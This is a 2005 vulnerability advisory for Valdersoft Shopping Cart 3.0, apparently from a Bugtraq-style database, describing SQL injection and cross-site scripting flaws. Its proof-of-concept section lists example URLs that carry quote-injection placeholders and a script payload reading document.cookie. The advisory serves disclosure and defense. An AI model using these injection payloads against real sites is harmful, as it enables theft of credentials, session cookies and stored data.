Valdersoft Shopping Cart Multiple Input Validation Vulnerabilities
BID:12916
Info
Valdersoft Shopping Cart Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 12916 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 28 2005 12:00AM |
| Updated: | Mar 28 2005 12:00AM |
| Credit: | Discovery of these issues is credited to Diabolic Crab. |
| Vulnerable: |
Valdersoft Shopping Cart 3.0 |
| Not Vulnerable: | |
Discussion
Valdersoft Shopping Cart Multiple Input Validation Vulnerabilities
Multiple input validation vulnerabilities reportedly affect Valdersoft Shopping Cart. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions.
An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
Multiple input validation vulnerabilities reportedly affect Valdersoft Shopping Cart. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions.
An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
Exploit / POC
Valdersoft Shopping Cart Multiple Input Validation Vulnerabilities
No exploit is required, the following examples are available:
http://www.example.com/store/category.php?sid=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION
http://www.example.com/store/item.php?si d=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION
http://www.example.com/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang='SQL_INJECTION
http://www.example.com/store/ search_result.php?sid=&searchTopCategoryID=&searchQuery='SQL_INJECTION&sid=CDFE279AC2AD08522DF1CF9B46475132¤cy=USD
http://www.example.com/store/search_result.php?sid= CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID='SQL_INJECTION&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132¤cy=USD
http://www.example.com/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C/script%3E
http://www.example.com/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132¤cy=USD
No exploit is required, the following examples are available:
http://www.example.com/store/category.php?sid=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION
http://www.example.com/store/item.php?si d=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION
http://www.example.com/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang='SQL_INJECTION
http://www.example.com/store/ search_result.php?sid=&searchTopCategoryID=&searchQuery='SQL_INJECTION&sid=CDFE279AC2AD08522DF1CF9B46475132¤cy=USD
http://www.example.com/store/search_result.php?sid= CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID='SQL_INJECTION&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132¤cy=USD
http://www.example.com/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C/script%3E
http://www.example.com/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132¤cy=USD
Solution / Fix
Valdersoft Shopping Cart Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Valdersoft Shopping Cart Multiple Input Validation Vulnerabilities
References:
References:
- Valdersoft Shopping Cart Homepage (Valdersoft)